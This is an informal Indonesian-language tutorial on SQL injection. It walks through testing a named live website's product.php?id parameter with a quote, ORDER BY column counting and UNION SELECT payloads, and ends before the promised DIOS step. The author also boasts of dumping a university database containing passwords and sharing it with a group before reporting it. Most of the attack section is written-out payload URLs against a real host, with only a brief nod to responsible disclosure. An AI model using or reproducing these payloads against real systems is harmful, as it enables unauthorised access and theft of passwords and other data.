mengexploitasi suatu website yang memliki kelamehan pad website nya ITU SINGKATAN NYA SIH paling singkat nya Web yang sangat rentan SQL/web yang memlikik BUG SQL Sangat berbahaya karna databse dari website tersebut dapat di curi seperti karu kredit,password website dan databse penting lain nya kemarin baru saja saya menemukan bug di website universitas jayabrada kalo gk salah wwkwkwkwk lupa nama universitas nya inti ny itu nah saat itu saya berhasil melihat Databse website tersbut dannnn salagh satu database ada DATA PASSWORD karna saat itu udah sayasebar di grup saya saya buru buru lapor ke salah satu mahasiswa di situ namanya mas siapa ya lupa jug hm..... saya basa basi dulu lalu mas nya itu mealpor kan ke dosen nya dan dosen nya melaporkan ke programer nya awoakwoakqwoak aku buka lagi dan tidak bisa berati bug sql nya udah di TUTUP okh iya gas ke cara nya
Pertama tama kita testing dulu web nya saya langsung pake live target aja sekalian buat belajar oke web yang saya gunakan adalah http://coda.cc/product/product.php?id=4 nah itu website biasa nya buat bealjar ya untuk mengathui webnya vuln ato tidal kita kasih koma di atas seperti yang d dalam tanda kurung ( ') nah itu jadi nya kek gini
http://coda.cc/product/product.php?id=4'
jika di gitukan gambar eror ato muncul tulisan eror sql syntax berati VULN SQL
gass ke cara selanjut nya
kita kasih +ORDER+BY+1--+-
http://coda.cc/product/product.php?id=4%27+ORDER+BY+1--+-
jika masih eror kita hapus %27 nama nya BUG SQL pasti bedea beda setiap website ada yang harus di kasih union nya beda ada yang %27 nya gk di hapus jadi beda beda maka nya sering ikut SQL CALL Sql call adalah lomba sql inectiomn yang biasa nya harus munculin databse web nya ato apalah temen teman harus baca agara jika mengadapi bug yang sulit gampang kunci nya adalah NIAT boss jika menemukan BUG janagn di curi laporin aja Ke BSSN ato pemilik web nya nah
http://coda.cc/product/product.php?id=4+order+by+1--+-
itu gk eror kan
http://coda.cc/product/product.php?id=4+order+by+6--+-
jika 6 masih gk eror teru kita cari anga eror nya lagi
http://coda.cc/product/product.php?id=4+ORDER+BY+14--+-
karna kebetulan eror nya di angka 14 maka yang di pake angka 13 berati
http://coda.cc/product/product.php?id=4+ORDER+BY+13--+-
\tuh gk eror kan
selanjut nya kita +UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13--+-
union nya kita kasih sampe angka 13 mengapa?karna tadi eror nya sampe angka 13 jadi union nya ampe 13: http://coda.cc/product/product.php?id=4+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13--+- nah muncul angka n ya kan kita masukin dios di angka yang muncul nah di sini muncul angka 2 jadi di union kan ada angka 2 tuh kita hilangin anga 2 nya jadi nya sperti ini
http://coda.cc/product/product.php?id=4+UNION+SELECT+1,,3,4,5,6,7,8,9,10,11,12,13--+-
tuh angka nya ilang kan ytang di union nya nah diangka yang ilang kita masukin dios next kita akan AAJARIN CARA BIKIN DIOS UNTUK SQL ok itu saja dari saya terimakasih ...................
